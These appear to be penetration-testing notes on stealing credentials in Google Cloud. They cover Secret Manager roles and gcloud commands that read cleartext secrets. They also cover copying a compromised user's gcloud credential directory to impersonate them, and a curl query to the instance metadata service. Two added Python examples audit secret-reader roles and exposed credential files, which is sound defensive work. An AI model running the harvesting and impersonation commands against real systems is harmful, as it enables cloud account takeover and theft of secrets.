Credential Access

Credential access is a set of techniques that attackers use to steal user credentials like account names and passwords.

Secret Manager

Secret Manager is a service utilized for securely storing all types of secrets, such as keys and passwords, within Google Cloud. Permissions within Secret Manager can be defined either project-wide or on an individual secret basis, offering granular control over access to sensitive information.

- Cleartext Credential Access

Cleartext Credential Access involves threat actors aiming to obtain the plaintext value of a secret stored in Secret Manager. The underlying permission is secretmanager.versions.access; roles that grant it include roles/owner, roles/secretmanager.admin, and roles/secretmanager.secretAccessor.

Check the IAM policy at project level (which roles a given member holds):

gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

List all the secrets in a project:

gcloud secrets list

Get the IAM policy on an individual secret:

gcloud secrets get-iam-policy [my-secret]

List all versions of a secret:

gcloud secrets versions list [SecretName]

Get the cleartext value of a secret:

gcloud secrets versions access --secret cpsa-key-json [1]
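An added example (not code from the original page) that reads the two IAM policies the commands above retrieve, in the JSON shape that gcloud projects get-iam-policy --format=json and gcloud secrets get-iam-policy SECRET --format=json print, and reports every member holding one of the three roles named above at either project or secret scope. Both policies below are constructed sample data; the principals, project name and secret name in them are placeholders.

```python
"""Audit who can read cleartext Secret Manager values from two IAM policies.

Added example, not code from the original page. Input is the JSON that
`gcloud projects get-iam-policy --format=json` and
`gcloud secrets get-iam-policy SECRET --format=json` print. The two policies
below are constructed sample data, not real policies.
"""
import json

# Roles that include secretmanager.versions.access, as listed on the page.
SECRET_READ_ROLES = {
    "roles/owner",
    "roles/secretmanager.admin",
    "roles/secretmanager.secretAccessor",
}

# Constructed sample: project-level policy. roles/viewer does not grant secret access.
PROJECT_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/owner", "members": ["user:admin@example.test"]},
    {"role": "roles/viewer", "members": ["user:emp01@example.test"]},
    {"role": "roles/secretmanager.admin",
     "members": ["serviceAccount:ci-runner@example-project.iam.gserviceaccount.com"]}
  ],
  "etag": "BwXconstructed0=",
  "version": 1
}
""")

# Constructed sample: policy on one secret, including an expired conditional binding.
SECRET_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/secretmanager.secretAccessor",
     "members": ["user:emp01@example.test", "group:platform-oncall@example.test"]},
    {"role": "roles/secretmanager.secretAccessor",
     "members": ["user:contractor@example.test"],
     "condition": {"title": "expires",
                   "expression": "request.time < timestamp('2020-01-01T00:00:00Z')"}},
    {"role": "roles/secretmanager.viewer", "members": ["user:auditor@example.test"]}
  ],
  "etag": "BwXconstructed1=",
  "version": 3
}
""")


def readers_in_policy(policy, scope):
    """Return {member: [(scope, role, is_conditional)]} for bindings with a read role."""
    found = {}
    for binding in policy.get("bindings", []):
        role = binding.get("role")
        if role not in SECRET_READ_ROLES:
            continue
        conditional = "condition" in binding  # conditional grants need manual review
        for member in binding.get("members", []):
            found.setdefault(member, []).append((scope, role, conditional))
    return found


def effective_secret_readers(project_policy, secret_policy):
    """Merge grants: a secret-level binding adds to, never removes, a project-level one."""
    merged = readers_in_policy(project_policy, "project")
    for member, grants in readers_in_policy(secret_policy, "secret").items():
        merged.setdefault(member, []).extend(grants)
    return merged


def report(readers):
    """Render one line per member, listing every scope/role that grants read access."""
    lines = []
    for member in sorted(readers):
        grants = ", ".join(
            f"{scope}:{role}{' (conditional)' if cond else ''}"
            for scope, role, cond in readers[member]
        )
        lines.append(f"{member}: {grants}")
    return lines


if __name__ == "__main__":
    for line in report(effective_secret_readers(PROJECT_POLICY, SECRET_POLICY)):
        print(line)
```

Note that gcloud projects get-iam-policy shows only bindings set on the project itself; roles inherited from a folder or organization do not appear in that output, so the merged list is a lower bound on who can read the value, and conditional bindings still need their expression checked by hand.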

Source Code / Configuration file

We can find credentials in the source code of the application, or, if we are able to compromise an instance or a user, we can harvest that user's gcloud config directory.

Gcloud stores creds in ~/.config/gcloud/credentials.db, so, to search home directories:

sudo find /home -name "credentials.db"

Then, copy the gcloud directory to your own home directory to authenticate as the compromised user:

sudo cp -r /home/username/.config/gcloud ~/.config

sudo chown -R currentuser:currentuser ~/.config/gcloud

gcloud auth list
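An added example (not code from the original page) that automates the find step above from the defender's side: it walks a home-directory tree, locates gcloud credential stores, and reports which ones are readable by group or other users or are owned by someone other than the home directory's owner, which is exactly the condition that lets one compromised account on a shared host pick up another user's gcloud identity. The tree it inspects is constructed in a temporary directory with empty placeholder files; access_tokens.db is included because it sits beside credentials.db in the same directory, though the page names only credentials.db.

```python
"""Locate gcloud credential stores under a home tree and flag exposed ones.

Added example, not code from the original page. build_demo_tree() creates a
constructed layout of empty placeholder files in a temp directory; nothing in
it is a real credential store.
"""
import os
import stat
import tempfile

# credentials.db is named on the page; access_tokens.db lives beside it (added here).
CRED_FILES = {"credentials.db", "access_tokens.db"}


def find_credential_stores(root):
    """Yield credential store paths that sit directly inside a 'gcloud' directory."""
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) != "gcloud":
            continue  # a stray credentials.db elsewhere is not a gcloud store
        for name in filenames:
            if name in CRED_FILES:
                yield os.path.join(dirpath, name)


def audit_credential_stores(root):
    """Return one finding per store: mode bits, cross-user readability, owner check."""
    findings = []
    for path in sorted(find_credential_stores(root)):
        st = os.stat(path)
        rel = os.path.relpath(path, root)
        # First path component under root is the home directory (e.g. /home/<user>).
        home_dir = os.path.join(root, rel.split(os.sep)[0])
        findings.append({
            "path": path,
            "rel": rel,
            "mode": stat.S_IMODE(st.st_mode),
            "readable_by_others": bool(st.st_mode & (stat.S_IRGRP | stat.S_IROTH)),
            "owner_matches_home": st.st_uid == os.stat(home_dir).st_uid,
        })
    return findings


def risky_findings(root):
    """Only the stores another local user could read or that belong to someone else."""
    return [f for f in audit_credential_stores(root)
            if f["readable_by_others"] or not f["owner_matches_home"]]


def build_demo_tree():
    """Constructed sample layout: alice is locked down, bob's store is world-readable."""
    root = tempfile.mkdtemp(prefix="gcloud-audit-demo-")
    layout = {
        "alice": {"credentials.db": 0o600, "access_tokens.db": 0o600},
        "bob": {"credentials.db": 0o644},
    }
    for user, files in layout.items():
        gdir = os.path.join(root, user, ".config", "gcloud")
        os.makedirs(gdir)
        for name, mode in files.items():
            path = os.path.join(gdir, name)
            with open(path, "w") as fh:
                fh.write("")  # placeholder only; not a real credential store
            os.chmod(path, mode)
    # Decoy outside any gcloud directory: must not be reported.
    decoy_dir = os.path.join(root, "carol", "notes")
    os.makedirs(decoy_dir)
    with open(os.path.join(decoy_dir, "credentials.db"), "w") as fh:
        fh.write("")
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for finding in audit_credential_stores(demo_root):
        flag = "EXPOSED" if finding in risky_findings(demo_root) else "ok"
        print(f"{flag:8} {finding['rel']} mode={finding['mode']:o}")
```

Run against a real host with audit_credential_stores("/home") as root; the owner check is what catches a store copied between home directories, which the permission bits alone would not show.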

Environment Variable

Metadata

Query the metadata service (run from inside an instance; the Metadata-Flavor header is required):

curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
